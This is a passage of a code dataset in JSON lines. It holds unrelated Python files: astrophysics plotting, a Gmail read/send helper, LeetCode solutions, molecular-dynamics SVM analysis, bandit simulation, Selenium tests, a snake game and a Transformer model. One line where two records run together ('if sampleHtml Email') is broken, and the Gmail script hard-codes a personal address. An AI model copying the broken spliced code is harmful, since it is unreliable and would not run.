bins=bins)#, histtype='step',label='lorentzian')\n ax[1].plot(BIN,dens/len(random_lorentzian_trunc),'b',label='truncated Lorentzian') \n dens,BINS = np.histogram(random_gaussian, bins=bins)#, histtype='step',label='lorentzian')\n ax[1].plot(BIN,dens/len(random_gaussian),'r',label='Gaussian')\n dens,BINS = np.histogram(random_stdev, bins=bins)#, histtype='step',label='lorentzian')\n ax[1].plot(BIN,dens/len(random_stdev),'orange',label='Gaussian(stdev)')\n\n ax[0].set_ylabel('normalised counts')\n for i in range(2):\n ax[i].set_xlim(-maxdv-5,maxdv+5)\n ax[i].set_xlabel('$\\Delta$ v (km/s)')\n ax[i].set_ylim(0,1.8*max(den)/norm)\n ax[i].grid(True)\n ax[i].legend(loc=2)\n plt.savefig('{}_distribution_{}_maxdv{}.png'.format(TYPE,zrange,maxdv))\n plt.close()\n else:\n print('generating Vsmeared peculier velocities:',index)\n\n # save the random arrays\n \"\"\"\n for k,randoms in enumerate([random_lorentzian,random_gaussian,random_stdev,random_lorentzian_trunc,random_data]):\n vsmear.append((data[:,-1]+(randoms*(1+z)/H)%boxsize)%boxsize)\n np.savetxt(sourcefile+'mock0_smear/mock0_smear{}.dat'.format(index),np.hstack((data,np.array(vsmear).T)))\n \n ## add the data-like distribution later\n vsmear = np.loadtxt(sourcefile+'mock0_smear/mock0_smear{}.dat'.format(index))\n vsmear_data = (data[:,-1]+(random_data*(1+z)/H)%boxsize)%boxsize\n np.savetxt(sourcefile+'mock0_smear/mock0_smear{}.dat'.format(index),np.hstack((vsmear,vsmear_data.reshape(len(data),1))))\n \"\"\"\nelif task == 'lorentzian_random':\n # test: histogram of the random samples agrees with the observations\n from scipy.stats import cauchy\n fig,ax = plt.subplots(ncols=2,nrows=2,figsize=(12, 10))\n for i in range(2):\n if i==0:\n rand = cauchy.rvs(loc=0, scale=popt1[1]/2, size=int(5e5))#int(len(dv)))\n numS,binS = np.histogram(rand,bins =bins)#,density=True)\n label = 'simulated without extra samples'\n else:\n rand = cauchy.rvs(loc=0, scale=popt1[1]/2, size=int(6e5))#int(len(dv)*1.1))\n numS,binS = np.histogram(rand,bins =bins)#,density=True)\n label = 'simulated with extra samples'\n\n for j in range(2):\n ax[i,j].plot(BIN,numS/len(rand),'r--',label=label)\n #dens,BINS,plot = ax[i,j].hist(dv, bins=bins, histtype='step',label='data')\n dens,BINS = np.histogram(dv, bins=bins)#, histtype='step',label='data')\n ax[i,j].plot(BIN,dens/norm,'k',label='data')\n ax[i,j].plot(BIN,lorentzian(BIN,popt1[0]/norm,popt1[1],popt1[2]),label='analitical')\n ax[i,j].set_xlabel('$\\Delta$ v')\n ax[i,j].set_ylabel('counts')\n if j==0:\n ax[i,j].legend(loc=0,fontsize=10)\n ax[i,j].set_ylim(0,1.8*max(dens)/norm)\n if j ==1:\n ax[i,j].set_yscale('log')\n ax[i,j].set_ylim(10/norm,1.8*max(dens)/norm)\n\n plt.savefig('lorentzian_distribution.png')\n plt.close()\n\nelif task == 'voigt_random':\n # test pesudo-voigt distribution: have difficulty in normalisation\n # len(dv) is the normalisation of the standard voigt\n Nsample = int(5.5e5)\n x = []\n simu = []\n samples = []\n cQ = 1/len(BIN)*5\n #popt2, pcov21 = curve_fit(pvoigt,BIN,dens/norm,bounds=(np.array([0,0,-np.inf,0]),np.array([np.inf,1000,np.inf,np.inf])))\n #import pdb;pdb.set_trace()\n\n for i in range(Nsample):\n random = np.random.uniform(low=-maxdv,high=maxdv)\n value = np.interp(random,BIN,dens/norm)\n #value = 10*pvoigt(random,popt2[3]*np.pi*popt2[1],popt2[1],popt2[2],popt2[3])\n #import pdb;pdb.set_trace()\n sample = np.random.uniform(0,cQ)\n if sampleHtml Email\"\n msgPlain = \"Hi\\nPlain Email\"\n SendMessage(sender, to, subject, msgHtml, msgPlain)\n # Send message with attachment: \n SendMessage(sender, to, subject, msgHtml, msgPlain, '/path/to/file.pdf')\n\ndef read_msg(user_email):\n credentials = get_credentials(user_email)\n\n service = build('gmail', 'v1',credentials=credentials)\n\n # request a list of all the messages\n result = service.users().messages().list(userId='me',maxResults=5).execute()\n print ('result ', result)\n # We can also pass maxResults to get any number of emails. Like this:\n # result = service.users().messages().list(maxResults=200, userId='me').execute()\n messages = result.get('messages')\n contents = []\n for msg in messages:\n # Get the message from its id\n txt = service.users().messages().get(userId='me', id=msg['id']).execute()\n print (txt)\n # Use try-except to avoid any Errors\n try:\n # Get value of 'payload' from dictionary 'txt'\n payload = txt['payload']\n headers = payload['headers']\n # print (payload)\n\n # Look for Subject and Sender Email in the headers\n for d in headers:\n if d['name'] == 'Subject':\n subject = d['value'] \n # print (subject)\n if d['name'] == 'From':\n sender = d['value']\n \n # The Body of the message is in Encrypted format. So, we have to decode it.\n # Get the data and decode it with base 64 decoder.\n parts = payload.get('parts')[0]\n # print (parts)\n data = parts['body']['data']\n data = data.replace(\"-\",\"+\").replace(\"_\",\"/\")\n decoded_data = base64.b64decode(data)\n # print (decoded_data)\n \n # Now, the data obtained is in lxml. So, we will parse \n # it with BeautifulSoup library\n soup = BeautifulSoup(decoded_data)\n # print (soup)\n # body = soup.body()\n # print (body)\n body = soup.decode_contents()\n \n # Printing the subject, sender's email and message\n # print(\"Subject: \", subject)\n print(\"From: \", sender)\n # print(\"Message: \", soup.decode_contents())\n # print('\\n')\n info = {\n \"sender\": sender,\n \"subject\": subject,\n \"body\": body\n }\n contents.append(info)\n \n except:\n\n pass\n return (contents )\n\n \n\nif __name__ == '__main__':\n read_msg('rmrsriram@gmail.com')","repo_name":"Ram3077/Ram3077","sub_path":"app_Sep24/writemail.py","file_name":"writemail.py","file_ext":"py","file_size_in_byte":7532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"27236014269","text":"# coding=utf-8\n\nfrom typing import List\n\n# @solution-sync:begin\nclass Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n a_i = 1\n b_i = 0\n while b_i < len(nums)-1:\n if nums[b_i] != nums[b_i + 1]:\n nums[a_i] = nums[b_i + 1]\n a_i = a_i+1\n b_i = b_i+1\n return a_i\n# 双指针\n# 指针一为判断数组内相邻数据是否相同,此为是否移动指针二的必要判断条件 while 循环实现,单层循环实现\n# 指针二为变更数组内容的指针,该指针主要在满足条件的时候进行数据变更\n# @solution-sync:end\n\n\nif __name__ == '__main__':\n nums = [1, 1, 2]\n\n result = Solution().removeDuplicates(nums)\n print(result)\n","repo_name":"hereTac/ax","sub_path":"leetcode/array/删除有序数组中的重复项.py","file_name":"删除有序数组中的重复项.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"29568427187","text":"# some basic python imports \nimport msmexplorer as msme\nimport numpy as np\nget_ipython().run_line_magic('pylab', 'inline')\nimport seaborn as sns \nsns.set_style(\"whitegrid\")\nsns.color_palette(\"colorblind\")\nsns.set_context(\"poster\",1.3)\nimport mdtraj as md\nfrom msmbuilder.utils import load,dump\n\nloc = \"./data/\"\n\nall_atom_trj = md.load(\"%s/0.pdb\"%loc)\n\nall_atom_f = load(\"./data/all_atom_featurizer.pkl\")\nall_atom_df = load(\"./data/all_atom_feature_descriptor.pkl\")\n\nall_atom_df.head(10)\n\nnrm = load(\"./data/nrm.pkl\")\n\nfrom sklearn.svm import SVC\nimport os\n\ntrain=False \nif not os.path.isfile(\"./data//svm_model.pkl\"):\n clf = SVC(kernel=\"linear\")\n train =True \nelse:\n clf = load(\"./data/svm_model.pkl\")\n train =False\n\n# Unfortunately, we can't provide the actual features but the trainging for these models is the same as alanine \n# except we now use a second transform \n\n# here basin_!.hdf5 is the trajectory from the unfolded state, and basin_2.hdf5 is the trajecotory from the folded state\n\n# t1 = md.load(\"./basin_1.hdf5\")\n# t2 = md.load(\"./basin_2.hdf5\")\n\n# features = all_atom_f.fit_transform([t1,t2])\n# nrm_features = nrm.fit_transform(np.concatenate(features))\n\n# train_X=np.vstack(nrm_features)\n\n# train_Y=np.concatenate([np.zeros(1000),\n# np.ones(1000)])\n# if train:\n# clf.fit(train_X, train_Y)\n# else:\n# pass\n\n\n\nall_atom_df.iloc[np.argsort(np.abs(clf.coef_))[0]]\n\nclr_plt = sns.color_palette(\"colorblind\")\nplot(clf.coef_.T,marker='o',c=clr_plt[2])\nvlines(14,-.15,0.15,linestyles='dashed')\nvlines(50,-.15,0.15,linestyles='dashed')\nylim([-.15,0.15])\nxlabel(\"Feature Index\")\nylabel(r'SVM coefficient')\n\n# in these train_x is from above\n# b=clf.decision_function(train_X)/np.linalg.norm(clf.coef_)\n# np.std(b[1000:])\n\nplot(b[:1000],label=\"Unfolded state\",c=clr_plt[0])\nplot(b[1000:],label=\"Folded state\",c=clr_plt[1])\nlegend()\nxlabel(\"Training simulation time (ns)\")\nylabel(r'$SVM_{cv}$')\nxticks([0,200,400,600,800,1000],[0,400,800,1200,1600,2000])\nylim([-12,6])\n\nfrom tica_metadynamics.pyplumed import render_df\nfrom tica_metadynamics.pyplumed import render_meta \nfrom jinja2 import Template\nfrom sklearn.utils.validation import check_is_fitted\n\nplumed_matheval_template = Template(\"MATHEVAL ARG={{arg}} FUNC={{func}} LABEL={{label}} PERIODIC={{periodic}} \")\n\nplumed_combine_template = Template(\"COMBINE LABEL={{label}} ARG={{arg}} COEFFICIENTS={{coefficients}} \"+ \"PERIODIC={{periodic}} \")\ndef render_svm(clf=None, input_prefix=\"f0\", output_prefix=\"l\"):\n if clf is None or check_is_fitted(clf,attributes=[\"coef_\",\"intercept_\"]):\n raise ValueError(\"Need a fitted Sklearn SVM object\")\n else:\n n_args = clf.coef_.shape[1]\n output = []\n arg_list=\",\".join([\"%s_%d\"%(input_prefix,i) for i in range(n_args)])\n coeff = \",\".join([str(i) for i in clf.coef_[0]])\n w_norm = np.linalg.norm(clf.coef_)\n \n output.append(plumed_combine_template.render(label=\"%s_0\"%output_prefix,\n arg=arg_list,\n coefficients=coeff,\n periodic=\"NO\")+\"\\n\")\n \n func=\"(x+%s)/%s\"%(str(clf.intercept_[0]),str(w_norm))\n \n output.append(plumed_matheval_template.render(label=\"%s_1\"%output_prefix,\n arg=\"l_0\",\n func=func,\n periodic=\"NO\")+\"\\n\") \n \n return ''.join(output)\n \n \n\ntotal_out=[]\ntotal_out.extend(\"RESTART\\n\")\ntotal_out.extend(render_df(all_atom_df,nrm=nrm))\ntotal_out.extend(render_svm(clf))\ntotal_out.extend(render_meta.render_metad_code(\"l_1\",biasfactor=6,sigma=0.25))\ntotal_out.extend(render_meta.render_metad_bias_print(\"l_1,metad.bias\"))\n\nprint(\"\".join(total_out))\n\n# We can now analyze the multiple walker simulations in differnt ways\n\n# for example, we can concatenate all trajectories and load the bias for each frame in that single long traj\n\n\n\nloc = \"./data/reweight/\"\ntest_traj = md.load(\"%s/all_traj.xtc\"%loc,top=\"%s/top.pdb\"%loc)\nbias = np.loadtxt(\"%s/BIAS\"%loc)\n#bias = np.loadtxt(\"./reweight2/reweight//BIAS\")\n#bias = np.loadtxt(\"./reweight//BIAS\")\n\ntest_X = nrm.transform(all_atom_f.transform([test_traj])[0])\nsklearn_out = clf.decision_function(test_X)/np.linalg.norm(clf.coef_)\n\n\nplot(sklearn_out, label=\"ALL WALKERS\")\nlegend()\n\nplot(sklearn_out,bias[:,1])\nxlabel(\"SKLearn Values\")\nylabel(\"Plumed Values\")\n\nclr_plt = sns.color_palette(\"colorblind\")\nax,data=msme.plot_free_energy(bias,obs=[1],n_samples=50000,pi=np.exp(bias[:,-1]/2.83),\n cmap='viridis',gridsize=400,return_data=True,shade=False,color=clr_plt[5])\nax.set_ylim([0,3])\nxlabel(r'$SVM_{cv}$'+\"\\nUnfolded to Folded\")\nylabel(\"Free Energy (kcal/mol)\")\n\n# Or simply sum up the hills\n\nfes = np.loadtxt(\"./%s/fes.dat\"%loc)\n\nplot(fes[:,0],(fes[:,1]-fes[:,1].min())/4.18,c=clr_plt[5])\nylim([0,4])\nxlabel(r'$SVM_{cv}$'+\"\\nUnfolded to Folded\")\nylabel(\"Free Energy (kcal/mol)\")\n\nfolded_pdb = md.load_pdb(\"https://files.rcsb.org/view/2RVD.pdb\")\n\nfolded_pdb_decision_func = clf.decision_function(np.concatenate([nrm.transform(i) for i in all_atom_f.transform(folded_pdb)])) /np.linalg.norm(clf.coef_)\n\nfolded_pdb_decision_func\n\nca_traj = test_traj.atom_slice([i.index for i in test_traj.top.atoms if i.name=='CA'])\nca_folded_pdb= folded_pdb.atom_slice([i.index for i in folded_pdb.top.atoms if i.name=='CA'])\n\nrmsd_data = md.rmsd(ca_traj,ca_folded_pdb)\nplot(rmsd_data,label=\"ALL WALKERS\")\nlegend()\nxlabel(\"Time (ns)\")\nxticks([0,10000,20000,30000,40000,50000,60000],np.array([0,10000,20000,30000,40000,50000,60000])/2)\nylabel(\"RMSD to folded (nm)\")\n\nrmsd_dict={}\nfor walker_index in range(25):\n test_traj = md.load(\"%s/walker_%d.xtc\"%(loc,walker_index),top=\"%s/top.pdb\"%loc)\n ca_traj = test_traj.atom_slice([i.index for i in test_traj.top.atoms if i.name=='CA'])\n ca_folded_pdb= folded_pdb.atom_slice([i.index for i in folded_pdb.top.atoms if i.name=='CA'])\n rmsd_data = md.rmsd(ca_traj,ca_folded_pdb)\n rmsd_dict[walker_index] = rmsd_data\n\n# quick hack to find interesting trajectories \n\nnp.argsort([np.median(rmsd_dict[i]) for i in range(25)])\n\nfor i in [24,10,14,15,8]:\n plot(rmsd_dict[i])\n\nwalker_index = 24\ntest_traj = md.load(\"%s/walker_%d.xtc\"%(loc,walker_index),top=\"%s/top.pdb\"%loc)\ntest_X = nrm.transform(all_atom_f.transform([test_traj])[0])\nsklearn_out = clf.decision_function(test_X)/np.linalg.norm(clf.coef_)\n\nsubplot(2,1,1)\nplot(sklearn_out[:600],c=clr_plt[1],label=\"Walker 25 (of 25)\")\nylabel(r'$SVM_{cv}$')\nlegend()\nxticks([0,200,400,600],[])\nylim([-12,9])\nsubplot(2,1,2)\nplot(rmsd_dict[24][:600],c=clr_plt[5],label=\"Walker 25 (of 25)\")\nlegend()\nxticks([0,200,400,600],[0,10,20,30])\nxlabel(\"Metdynamics simulation time (ns)\")\nylabel(\"RMSD(nm) to folded\")\n# vlines(585,0.1,0.8,linestyles='dotted')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"mixmikmic/GH_code_analysis","sub_path":"python/svm_chignolin.py","file_name":"svm_chignolin.py","file_ext":"py","file_size_in_byte":6953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"22670271727","text":"'''RestlessArm: an arm whose states evolve based on an underlying MDP\n'''\nfrom typing import Callable\nimport logging\nimport numpy as np\n\nfrom src.Arms.Arm import Arm\n\nclass RestlessArm(Arm):\n '''RestlessArm: an arm whose states evolve based on an underlying MDP\n '''\n def __init__(self, \n id: int, \n transition_matrix: np.ndarray,\n seed: int = 0, \n initial_state: int = 1,\n n_states: int = None, \n n_actions: int = None,\n rho: Callable = lambda b: b, \n r: Callable = None, \n error_log: logging.Logger = logging.getLogger('error_log'),\n verbose: bool = False, \n **kwargs):\n '''\n Init a RestlessArm, which transitions states according to the MDP transition_matrix\n \n :param id: ID of the arm\n :param transition_matrix: (n_actions x n_states x n_states) np.ndarray\n :param seed: seeds the rng, default 0\n :param initial_state: initial state of the arm, defaults to 1. If -1, random\n :param n_states: int number of states, default 2\n :param n_actions: int number of actions, default 2\n :param rho: Callable, optional local reward rho(b) function for WhittleIndexPolicy\n :param r: Callable, optional local reward r(s) function for computing local reward\n :param error_log: error log, defaults to logging.getLogger('error_log')\n :param verbose: flag for extra prints to the console, defaults to False\n :param **kwargs: optional kwargs, passed into Arm\n\n '''\n \n # Transition matrix is a required kwarg, has a required shape:\n assert(len(transition_matrix.shape)==3)\n assert(transition_matrix.shape[1]==transition_matrix.shape[2])\n if n_states is None:\n n_states = transition_matrix.shape[1]\n else:\n assert(n_states == transition_matrix.shape[1])\n if n_actions is None:\n n_actions = transition_matrix.shape[0]\n else:\n assert(n_actions == transition_matrix.shape[0])\n \n # Initialize general arm properties\n Arm.__init__(self, id=id, error_log=error_log, verbose=verbose, **kwargs)\n self.transition = transition_matrix\n self.n_states = n_states\n self.n_actions = n_actions\n self.initial_state = initial_state\n self.reset(seed=seed, initial_state=initial_state)\n \n # Initialize reward function properties\n self.rho = rho # rho(b) is used to calculate Whittle index\n if r is None:\n self.r = rho # r(s) is used to calculate local reward\n else: \n self.r = r\n\n def reset(self, seed: int, initial_state: int = None):\n '''\n Resets in place:\n self.rng\n self.actions\n self.state\n self.belief\n self.last_known_state\n self.time_since_pulled\n self.belief_chains\n \n :param seed: seed for the rng Generator\n :param initial_state: int initial states, defaults to self.initial_state\n \n Simulations should pass in a seed to standardize transitions.\n '''\n \n self.rng = np.random.default_rng(seed)\n \n self.actions = []\n \n if initial_state is None:\n initial_state = self.initial_state\n \n if initial_state == -1:\n self.state = [self.rng.integers(self.n_states)]\n else: \n self.state = [initial_state]\n \n self.belief = self.state.copy()\n \n self.last_known_state = 1 # Used for whittle index computation\n self.time_since_pulled = 1 # Time since pulled = # of days since the arm was last pulled. If pulled in t, it gets updated to = 1 at t+1.\n\n # gets initialized/computed when WhittleIndex policy is called\n self.belief_chains = None\n \n def compute_next_belief(self, action: int):\n '''\n Belief is recursive. Given the previous belief and the action computed, return the next belief.\n \n :param action: int in arange(n_actions)\n :return: the next belief given action\n\n '''\n return self.belief[-1] * self.transition[action, 1, 1] + \\\n (1 - self.belief[-1]) * self.transition[action, 0, 1]\n \n def _update_true_state(self, action: int):\n '''\n Updates (appends) in place:\n the (true) self.state of the arm based on the action\n self.actions\n Must be called before self._update_belief_state. See self.update()\n \n :param action: int in arange(n_actions)\n \n The action at index t represents the action taken when going from state t to t+1\n e.g. actions[1] is the action that moves state[1] to state[2]\n '''\n self.actions.append(action)\n\n # This update applies to Restless AND Collapsing arms\n if action == 0:\n self.time_since_pulled +=1\n else:\n self.time_since_pulled = 1\n \n outcome = self.rng.random()\n if outcome <= self.transition[action, self.state[-1], 0]: \n self.state.append(0)\n else:\n self.state.append(1)\n\n if type(self).__name__ == \"RestlessArm\":\n self.last_known_state = self.state[-1]\n # Collapsing arm's \"last_known_state\" gets in self._update_belief_state()\n return\n\n\n def _update_belief_state(self):\n '''\n Updates (appends) in place:\n self.belief with self.state\n Must be called after self._update_true_state(), see self.update()\n\n '''\n if len(self.belief) != len(self.state) - 1:\n raise ValueError('Ensure self._update_true_state() has been called first')\n self.belief.append(self.state[-1])\n\n def update(self, action: int):\n '''\n Updates self.arm when action is taken\n \n :param action: int in arange(n_actions)\n\n '''\n self._update_true_state(action=action)\n self._update_belief_state()\n\n def compute_rho(self, t: int):\n '''\n Calculate local reward of belief, rho(b), at t\n \n :param t: int timestep \n :return: rho(b_t), float\n\n '''\n return self.rho(self.belief[t])\n \n def compute_r(self, t: int):\n '''\n Calculate local reward of true state, r(s), at t\n \n :param t: int timestep\n :return: r(s_t), float\n\n '''\n return self.r(self.state[t])\n\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"crherlihy/prob_fair_rmab","sub_path":"src/Arms/RestlessArm.py","file_name":"RestlessArm.py","file_ext":"py","file_size_in_byte":6674,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"} +{"seq_id":"3516635298","text":"import time\nimport unittest\n\nfrom frameworkutils.browserbase import BrowerBase\nfrom pageobjects.functions.desk import Desk\nfrom pageobjects.functions.loginPage import Login\n\nfrom pageobjects.functions.recruitment import Recruitment\n\n\nclass Test_Recruitment(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n browser = BrowerBase(cls)\n cls.driver = browser.open_browser(cls)\n # browser.login_success()\n\n @classmethod\n def tearDownClass(cls):\n # cls.driver.quit()\n print(\"结束\")\n\n#手机登录系统\n def test_1login_success(self):\n loginpage = Login(self.driver)\n loginpage.click_cell_login()\n loginpage.type_cellphone()\n loginpage.click_next()\n loginpage.type_pwd()\n loginpage.click_login_button()\n if loginpage.is_exist_element(loginpage.close_news):\n loginpage.click_close_news()\n self.assertIsNotNone(loginpage.login_success_ico)\n time.sleep(2)\n#进去招聘页面\n def test_2recruitment(self):\n deskpage = Desk(self.driver)\n time.sleep(2)\n deskpage.click_recruitment_menu()\n time.sleep(2)\n self.assertIsNotNone(deskpage.anpaimainshi)\n\n#新建招聘职位\n @unittest.skipIf(True,u\"为True的时候跳过\")\n def test_3new_job_position(self):\n jobpositionpage=Recruitment(self.driver)\n jobpositionpage.click_job_position_menu()\n jobpositionpage.click_add_position_button()\n jobpositionpage.input_job_name()\n time.sleep(2)\n jobpositionpage.click_job_save_button()\n\n#新建候选人\n def test_3candidatelist(self):\n jobpositionpage = Recruitment(self.driver)\n jobpositionpage.click_candidate_list_menu()\n jobpositionpage.choose_add_candidate()\n se=jobpositionpage.job_selection\n jobpositionpage.choose_job()\n jobpositionpage.input_candidate_name()\n jobpositionpage.input_cellphone()\n jobpositionpage.click_save()\n self.driver.execute_script()\n\n\n\n\n","repo_name":"Evading77/autoTestCode","sub_path":"AutoCode/Code/2haoTestCode/testsuites/test_recruitment.py","file_name":"test_recruitment.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"73365082989","text":"import math\r\ndef isperfect(n):\r\n num=int(math.sqrt(n))\r\n return (num*num)==n\r\n\r\nt=int(input())\r\nfor i in range(t):\r\n print(\"Case #\"+str(i+1)+\": \",end=\"\")\r\n inputs=list(map(int,input().split()))\r\n A=list(map(int,input().split()))\r\n alphabets=set()\r\n alphaorder=list()\r\n # if n==1:\r\n # print(\"AB\")\r\n # continue\r\n j=0\r\n n=len(A)-1\r\n while(j=0):\r\n alphaorder.insert(0,A[temp]//n)\r\n alphabets.add(A[temp]//n)\r\n n=A[temp]//n\r\n temp-=1\r\n n=len(A)\r\n temp=j+1\r\n while(temp span_drop or span_drop > 1:\n raise ValueError(\"span_drop valid range is [0,1)\")\n elif span_drop == 1:\n return [], []\n start_indexes = []\n end_indexes = []\n hypothesis_start_index = 1 + premise_len + 1\n hypothesis_end_index = hypothesis_start_index + hypothesis_len\n premise_step = calculate_step(premise_len, span_drop, max_spans)\n hypothesis_step = calculate_step(hypothesis_len, span_drop, max_spans)\n\n for i in range(1, premise_len + 1, premise_step):\n for j in range(i, premise_len + 1, premise_step):\n start_indexes.append(i)\n end_indexes.append(j)\n\n for i in range(hypothesis_start_index, hypothesis_end_index, hypothesis_step):\n for j in range(i, hypothesis_end_index, hypothesis_step):\n start_indexes.append(i)\n end_indexes.append(j)\n\n return start_indexes, end_indexes\n\n\ndef padd_and_and_collect(data, max_data_len, padding_token_id):\n data_tensor = torch.full([len(data), max_data_len],\n fill_value=padding_token_id,\n dtype=data[0][0].dtype)\n for i, sample in enumerate(data):\n data_tensor[i][:len(sample)] = sample\n\n return data_tensor\n\n\ndef calculate_step(range_len, span_drop, max_span_size):\n if span_drop == 0:\n return 1\n\n # Arithmetic progression sum\n number_of_spans = (range_len + 1) * (range_len - 1) / 2\n wanted_number_of_spans = min(ceil(number_of_spans * (1 - span_drop)), max_span_size)\n\n if wanted_number_of_spans == 0:\n return ceil(range_len)\n else:\n return ceil(range_len / sqrt(wanted_number_of_spans))\n","repo_name":"ItayDev/nli-span-info","sub_path":"data/collate.py","file_name":"collate.py","file_ext":"py","file_size_in_byte":3023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"27801331058","text":"import pygame\r\nimport apple #引入apple.py\r\nimport snake #引入snake.py\r\n#宣告想使用的顏色\r\nwhite = (255,255,255)\r\n\r\n#初始化apple.py裡面的Apple類別\r\n#宣告一個變數app_obj,是Apple類別的初始化\r\napp_obj = apple.Apple()\r\n\r\n#初始化snake.py裡面的Snake類別\r\n#宣告一個變數snake_obj,是Snake類別的初始化\r\nsnake_obj = snake.Snake()\r\n\r\npygame.init()\r\nscreen = pygame.display.set_mode((800,600))\r\nscreen.fill(white)\r\npygame.display.set_caption(\"貪食蛇遊戲\")\r\npygame.display.update()\r\n\r\ngameRun = True\r\ngameOver = False\r\nclock = pygame.time.Clock()\r\n\r\nwhile gameRun:\r\n clock.tick(10)\r\n for event in pygame.event.get():\r\n #事件捕捉\r\n if event.type == pygame.QUIT:\r\n gameRun = False\r\n if event.type == pygame.KEYDOWN:#按下按鈕\r\n if event.key == pygame.K_UP:#上\r\n if snake_obj.dir != \"下\":\r\n snake_obj.dir = \"上\"\r\n elif event.key == pygame.K_DOWN:#下\r\n if snake_obj.dir != \"上\":\r\n snake_obj.dir = \"下\"\r\n elif event.key == pygame.K_RIGHT:#右\r\n if snake_obj.dir != \"左\":\r\n snake_obj.dir = \"右\"\r\n elif event.key == pygame.K_LEFT:#左\r\n if snake_obj.dir != \"右\":\r\n snake_obj.dir = \"左\"\r\n screen.fill(white)\r\n app_obj.createApple()\r\n snake_obj.move(app_obj) #蛇移動的程式碼\r\n \r\n result = snake_obj.checkGameOver()\r\n if result == True:#GameOver後的行為\r\n gameOver = True\r\n #snake_obj = snake.Snake()\r\n\r\n #Game Over的畫面 \r\n while gameOver:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n gameOver = False\r\n gameRun = False\r\n if event.type == pygame.KEYDOWN:\r\n #按下ESC鍵\r\n if event.key == pygame.K_ESCAPE:\r\n gameOver = False\r\n snake_obj = snake.Snake()\r\n screen.fill((255,0,0))\r\n pygame.display.update()\r\n \r\n pygame.draw.rect(screen,\r\n (255,0,0),\r\n [app_obj.x, app_obj.y,10,10],\r\n 0)\r\n for body in snake_obj.body:\r\n pygame.draw.rect(screen,\r\n (0,0,255),\r\n [body[0], body[1],10,10],\r\n 0)\r\n \r\n pygame.display.update()\r\npygame.quit()\r\n","repo_name":"f0963217595/SnakeGame","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"43215109069","text":"from flask import render_template, jsonify, request\nfrom flask_login import login_required\n\nfrom . import bp_general\nfrom app.models import SensorReading, db\n\n\n@bp_general.route('/dashboard')\n@bp_general.route('/')\n@login_required\ndef dashboard():\n readings_value = db.session.query(SensorReading).order_by(SensorReading.id.desc()).first()\n sensor_readings = []\n # bad code\n if readings_value:\n sensor_readings = [('Температура', 'temperature', round(readings_value.temperature, 1)),\n ('Влажность', 'humidity', round(readings_value.humidity, 1)),\n ('Угарный газ', 'carbon_monoxide', int(readings_value.carbon_monoxide)),\n ('Атмосферное давление', 'atmosphere_pressure', int(readings_value.pressure))]\n \n else:\n sensor_readings = [('Температура', 'temperature', 0),\n ('Влажность', 'humidity', 0),\n ('Угарный газ', 'carbon_monoxide', 0),\n ('Атмосферное давление', 'atmosphere_pressure', 0)]\n \n\n if request.is_json:\n return jsonify({kit[1]: kit[2] for kit in sensor_readings})\n\n return render_template('general/dashboard.html', sensor_readings=sensor_readings, title='Dashboard')","repo_name":"stemirkhan/SmartSense","sub_path":"services/web/app/general/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"73320764911","text":"\"\"\"\nAll the lines are forked from https://github.com/hyunwoongko/transformer\n\"\"\"\n\nimport torch\nfrom torch import nn\n\nfrom Transformer.model.encoder import Encoder\nfrom Transformer.model.decoder import Decoder\n\nclass Transformer(nn.Module):\n\n def __init__(self, src_pad_idx,\n trg_pad_idx,\n trg_sos_idx,\n enc_voc_size,\n dec_voc_size,\n d_model,\n n_head,\n max_len,\n ffn_hidden,\n n_layers,\n dropout_rate,\n device):\n super(Transformer, self).__init__()\n self.src_pad_idx = src_pad_idx\n self.trg_pad_idx = trg_pad_idx\n self.trg_sos_idx = trg_sos_idx\n self.device = device\n\n self.encoder = Encoder(enc_voc_size=enc_voc_size,\n max_len=max_len,\n d_model=d_model,\n ffn_hidden=ffn_hidden,\n n_head=n_head,\n n_layers=n_layers,\n dropout_rate=dropout_rate,\n device=device)\n\n self.decoder = Decoder(dec_voc_size=dec_voc_size,\n max_len=max_len,\n d_model=d_model,\n ffn_hidden=ffn_hidden,\n n_head=n_head,\n n_layers=n_layers,\n dropout_rate=dropout_rate,\n device=device)\n\n def forward(self, src, trg):\n\n enc_src = self.encoder(src)\n output = self.decoder(trg, enc_src)\n\n return output\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"haesungpyun/transformer","sub_path":"model/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"9748813758","text":"import sys\n\n\nclass Solution:\n\n def sortedSquares(self, A):\n\n pos_ptr = 0\n\n while A[pos_ptr] < 0:\n pos_ptr += 1\n\n if len(A) == 1:\n return [A[0] ** 2]\n\n neg_ptr = pos_ptr - 1\n\n squared_number = list()\n\n while len(squared_number) != len(A):\n\n # pos pointer\n if pos_ptr == len(A):\n pos_ptr_sq = sys.maxsize\n\n else:\n pos_ptr_sq = A[pos_ptr] ** 2\n\n # neg pointer\n if neg_ptr == -1:\n neg_ptr_sq = sys.maxsize\n\n else:\n neg_ptr_sq = A[neg_ptr] ** 2\n\n # comparison and update\n if pos_ptr_sq < neg_ptr_sq:\n squared_number.append(pos_ptr_sq)\n pos_ptr += 1\n\n else:\n 